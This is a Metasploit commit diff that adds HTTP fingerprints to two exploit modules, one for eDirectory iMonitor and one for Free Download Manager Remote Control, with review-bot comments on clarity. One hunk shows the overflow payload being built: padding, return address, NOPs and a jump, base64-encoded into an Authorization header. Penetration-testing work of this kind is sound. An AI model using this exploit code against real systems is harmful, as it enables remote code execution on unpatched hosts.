add more http fingerprints

git-svn-id: file:///home/svn/framework3/trunk@9812 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-13 22:11:40 +00:00
parent e765553d26
commit 6d23204c6f
2 changed files with 17 additions and 4 deletions


@ -14,6 +14,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -23,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a stack buffer overflow in eDirectory 8.7.3
iMonitor service. This vulnerability was discovered by Peter
Winter-Smith of NGSSoftware.
NOTE: repeated exploitation attempts may cause eDirectory to crash. It does
not restart automatically in a default installation.
},
'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ],
'License' => BSD_LICENSE,
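Review bot: The trailing comment `# custom port` on the new `HttpFingerprint` line in the first hunk does not say what the two patterns identify or which part of the response they are compared against. A maintainer therefore cannot tell when the check needs updating. Something like `# iMonitor banner tokens (DHost/, HttpStk/); service listens on a non-default port` would make the intent explicit, if that is what is meant. The class body continues outside both hunks.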


@ -14,6 +14,13 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
# w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" )
# w/o auth: <title>FDM remote control server</title>
# w/o auth: <div align="right"><span class="style1"><span class="style4">Free Download Manager remote control server.</span><br />
# <span class="style4">Version 1.0.</span> </span></div>
# Extra url: /compdlds.req
HttpFingerprint = { :pattern => [ /(FDM Remote control server|Free Download Manager)/i ] } # XXX: A custom body check would be nice too
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -22,8 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack buffer overflow in Free Download Manager
Remote Control 2.5 Build 758. When sending a specially crafted
Authorization header, an attacker may be able to execute
arbitrary code.
Authorization header, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
@ -57,11 +63,13 @@ class Metasploit3 < Msf::Exploit::Remote
sploit = rand_text_alpha_upper(1012 - payload.encoded.length) + payload.encoded
sploit << [target.ret].pack('V') + make_nops(4) + [0xe8, -575].pack('CV')
sploit = Rex::Text.encode_base64(sploit)
print_status("Trying target #{target.name}...")
send_request_raw({
'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(sploit)}" }
send_request_raw(
{
'headers' => { 'Authorization' => "Basic #{sploit}" }
}, 2)
handler
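Review bot: In the first hunk the comments record two identification sources, the 401 realm string and the title/body of the unauthenticated page, but the `HttpFingerprint` line holds a single regex and its trailing XXX admits the body is not checked. If the fingerprint is built from response headers only (not visible here), the `Free Download Manager` alternative may never match, so the comment should state which case is covered, e.g. `# matches the 401 realm; the no-auth page is only identifiable by its body, which is not checked yet`. The capture group is unneeded: `/FDM Remote control server|Free Download Manager/i`. In the last hunk, reassigning `sploit` to its base64 form makes one name hold two representations; a separate local such as `auth_blob = Rex::Text.encode_base64(sploit)` would read more clearly.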